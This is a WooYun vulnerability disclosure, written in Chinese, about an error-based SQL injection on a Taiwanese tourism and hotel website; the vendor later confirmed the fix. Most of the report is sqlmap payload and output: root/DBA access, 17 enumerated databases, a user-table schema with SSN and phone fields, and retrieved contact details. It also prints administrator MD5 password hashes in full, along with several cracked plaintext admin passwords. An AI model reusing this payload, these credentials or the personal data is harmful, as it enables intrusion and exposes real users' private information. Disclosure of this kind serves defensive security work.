乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2015-12-04: 细节已通知厂商并且等待厂商处理中 2015-12-08: 厂商已经确认,细节仅向厂商公开 2015-12-18: 细节向核心白帽子及相关领域专家公开 2015-12-28: 细节向普通白帽子公开 2016-01-05: 厂商已经修复漏洞并主动公开,细节向公众公开
清境旅遊資訊網主站sql注入漏洞(dba权限/涉及17裤/影响近500用户帐号/md5可解密)
0x01注入点
http://**.**.**.**/sub/hotelview.asp?hno=182
500报错注入
0x02root用户
Place: GETParameter: hno Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE or HAVING clause Payload: hno=182 AND (SELECT 3471 FROM(SELECT COUNT(*),CONCAT(0x3a7878793aSELECT (CASE WHEN (3471=3471) THEN 1 ELSE 0 END)),0x3a716b6e3a,FLOOR(RAND(0)*2x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)---[13:19:35] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: MySQL 5.0[13:19:35] [INFO] fetching current user[13:19:36] [INFO] retrieved: root@localhostcurrent user: 'root@localhost'
0x03还是dba权限
[13:20:47] [INFO] the back-end DBMS is MySQLweb server operating system: Windows 2003web application technology: ASP.NET, Microsoft IIS 6.0, ASPback-end DBMS: MySQL 5.0[13:20:47] [INFO] testing if current user is DBA[13:20:47] [INFO] fetching current user[13:20:47] [INFO] resumed: root@localhost[13:20:47] [INFO] retrieved: 1current user is DBA: 'True'
0x04涉及17裤
available databases [17]:[*] cja[*] db[*] dbcount[*] dbforguestbooks[*] dbforhotel[*] dbformb[*] dbformbbooks[*] dbforpanel[*] dbforweb[*] dbforwork[*] download[*] imagebooks[*] information_schema[*] mysql[*] performance_schema[*] test[*] user
影响用户
Database: dbforhotel[78 tables]+-----------------+| ad || ad_news || ad_set || admrun || album || album_photo || banner || bannertype || cafe || cafepic || consultation || coupon || couponstyle || culture || epaper || excelfile || gbooksset || guide || guidepic || hhotelnews || hightrip || hightripic || hlink || holiday || holiday_memo || hotel || hpictext || keyword || keyword_t || l_map || link || link_friend || linkclass || login || mail || mailclass || mappost || maprepost || menubutton || menubuttonclass || message || mountainphoto || nature || newsad || newsad_1 || newskeyword || order_room || order_room_set || photo || present || project || restaurant || restaurantpic || room || room_number || roomlive || roomlive1 || roomliveday || sendmail || service || setting || shop || shopic || shownk || showphoto || sitemap || sitemapclass || specialty || sub_news || sub_p || traffic_need || trafficservice || trip || trip_turn || tripic || triplan || triplanday || worknew |+-----------------+
Table: login[22 columns]+--------------+--------------+| Column | Type |+--------------+--------------+| lAddress | varchar(255) || lBirthday | datetime || lCreatTime | datetime || lEarning | varchar(1) || lEducation | varchar(1) || lEmail | varchar(100) || lEnable | varchar(1) || lGender | varchar(1) || lHasChildren | varchar(1) || lHobby | varchar(2) || lLoginTime | datetime || lMarriage | varchar(1) || lMobile | varchar(25) || lName | varchar(100) || lNickname | varchar(10) || lNo | int(11) || lOccupation | varchar(2) || lPassword | varchar(32) || lSSN | varchar(10) || lssnRadio | varchar(1) || lSubscribe | varchar(1) || lTel | varchar(25) |+--------------+--------------+
268名,涉及邮箱,手机号码,登入地址等等
Database: dbforhotel+-------+---------+| Table | Entries |+-------+---------+| login | 146 |+-------+---------+
+-------+---------+| Table | Entries |+-------+---------+| login | 268 |+-------+---------+
Database: cja+---------+---------+| Table | Entries |+---------+---------+| cjauser | 22 |+---------+---------+
14:01:05] [INFO] retrieved: 0956-99303114:01:05] [INFO] retrieved: http://**.**.**.**/14:01:05] [INFO] retrieved: dddddd14:01:05] [INFO] retrieved: athena20070131u.doc14:01:06] [INFO] retrieved: ddddd14:01:06] [INFO] retrieved: ccss14:01:06] [INFO] retrieved: ../index.asp14:01:06] [INFO] retrieved:14:01:07] [INFO] retrieved: ????????????80?14:01:07] [INFO] retrieved:14:01:07] [INFO] retrieved: 2006-10-02 19:52:4214:01:07] [INFO] retrieved:14:01:07] [INFO] retrieved:14:01:08] [INFO] retrieved: www.jiamaei@**.**.**.**14:01:08] [INFO] retrieved: 014:01:08] [INFO] retrieved:14:01:08] [INFO] retrieved:14:01:09] [INFO] retrieved:14:01:09] [INFO] retrieved: 2010-09-08 07:42:2914:01:09] [INFO] retrieved:14:01:09] [INFO] retrieved:14:01:10] [INFO] retrieved: ????14:01:10] [INFO] retrieved:14:01:10] [INFO] retrieved: 214:01:10] [INFO] retrieved:14:01:10] [INFO] retrieved: 4291eca9f56529f463d90f7e3527856814:01:11] [INFO] retrieved:14:01:11] [INFO] retrieved: 114:01:11] [INFO] retrieved: 049-280394014:01:11] [INFO] retrieved: 049-280394114:01:12] [INFO] retrieved: jiamaei14:01:12] [INFO] retrieved: d01d02d03d08d09d10d11d12d13d18d19d20d2114:01:12] [INFO] retrieved: ??????????14:01:12] [INFO] retrieved:14:01:13] [INFO] retrieved: 2010-08-31 00:00:0014:01:13] [INFO] retrieved: 2010-07-10 00:00:00
贴出部分管理员用户
[22 entries]+-------+-------+---------------------+----------+---------+--------+------+-----------------------------------------+-------+| cuAdm | cuBaB | cuCreatTime | cuEnable | cuID | cuName | cuNo | cuPassword | cuRes |+-------+-------+---------------------+----------+---------+--------+------+-----------------------------------------+-------+| 0 | 1 | 2006-08-10 16:36:36 | 1 | 401 | ?????? | 2 | 816b112c6105b3ebd537828a39af4818 (401) | 0 || 0 | 1 | 2006-08-16 09:16:29 | 1 | 402 | ??? | 14 | 69cb3ea317a32c4e6143e665fdb20b14 (402) | 1 || 0 | 0 | 2006-08-16 09:45:06 | 1 | 403 | ?????? | 15 | bbf94b34eb32268ada57a3be5062fe7d | 0 || 0 | 0 | 2006-08-17 14:30:40 | 1 | 404 | ??? | 21 | 4f4adcbf8c6f66dcfc8a3282ac2bf10a | 0 || 0 | 0 | 2006-08-18 10:24:08 | 1 | 405 | ???? | 22 | bbcbff5c1f1ded46c25d28119a85c6c2 | 0 || 0 | 1 | 2006-08-18 11:02:35 | 1 | 406 | ???? | 23 | 8cb22bdd0b7ba1ab13d742e22eed8da2 (406) | 0 || 0 | 1 | 2006-08-18 11:29:26 | 1 | 407 | ??? | 24 | f4f6dce2f3a0f9dada0c2b5b66452017 | 0 || 0 | 1 | 2006-08-18 11:37:15 | 1 | 408 | ???? | 25 | 0d0fd7c6e093f7b804fa0150b875b868 | 0 || 0 | 1 | 2006-08-18 11:47:12 | 1 | 409 | ???? | 26 | a96b65a721e561e1e3de768ac819ffbb (409) | 0 || 0 | 0 | 2006-08-18 11:55:38 | 1 | 410 | ???? | 27 | 1068c6e4c8051cfd4e9ea8072e3189e2 | 0 || 0 | 0 | 2006-08-18 12:08:59 | 1 | 411 | ????? | 28 | 17d63b1625c816c22647a73e1482372b (411) | 0 || 0 | 0 | 2006-08-18 12:16:10 | 1 | 412 | ???? | 29 | b9228e0962a78b84f3d5d92f4faa000b | 0 || 0 | 0 | 2006-08-18 12:29:41 | 1 | 413 | ???? | 30 | 0deb1c54814305ca9ad266f53bc82511 (413) | 0 || 0 | 0 | 2006-08-15 09:58:30 | 1 | 501 | ??? | 13 | 5b69b9cb83065d403869739ae7f0995e (501) | 1 || 0 | 0 | 2006-08-17 08:58:11 | 1 | 502 | ??? | 16 | b337e84de8752b27eda3a12363109e80 (504) | 1 || 0 | 1 | 2006-08-17 09:59:21 | 1 | 503 | ???? | 17 | b337e84de8752b27eda3a12363109e80 (504) | 1 || 0 | 1 | 2006-08-17 10:10:01 | 1 | 504 | ???? | 18 | b337e84de8752b27eda3a12363109e80 (504) | 1 || 0 | 1 | 2006-08-17 10:13:51 | 1 | 505 | ???? | 19 | e8c0653fea13f91bf3c48159f7c24f78 | 1 || 0 | 0 | 2006-08-18 15:28:57 | 1 | 506 | ??? | 31 | ff4d5fbbafdf976cfdc032e3bde78de5 (506) | 0 || 1 | 0 | 2006-08-19 14:16:55 | 1 | adm2006 | adm | 32 | a4fa8d76cc8d25e6e1ad5a772dd951a5 | 0 || 1 | 0 | 2006-08-10 15:47:17 | 1 | arch | ???? | 1 | d6194c68fcc7e79bb57401be603cb1cc (arch) | 0 || 1 | 0 | 2008-09-20 15:14:16 | 1 | sunny | sunny | 33 | 4187db82d9b3c103dc996029dd723f55 | 0 |+-------+-------+---------------------+----------+---------+--------+------+-----------------------------------------+-------+
随便贴出两枚cmd5官网解密的: sunny rich230 arch arch adm adm20065枚数据库用户
[13:49:50] [INFO] retrieved: 5Database: mysql+-------+---------+| Table | Entries |+-------+---------+| user | 5 |+-------+---------+
包含
root root
0x05还存在文件上传,看了半天没看懂http://**.**.**.**/tmpuugvi.asp
危害等级:高
漏洞Rank:18
确认时间:2015-12-08 06:15
感謝通報
2016-01-05:確認修復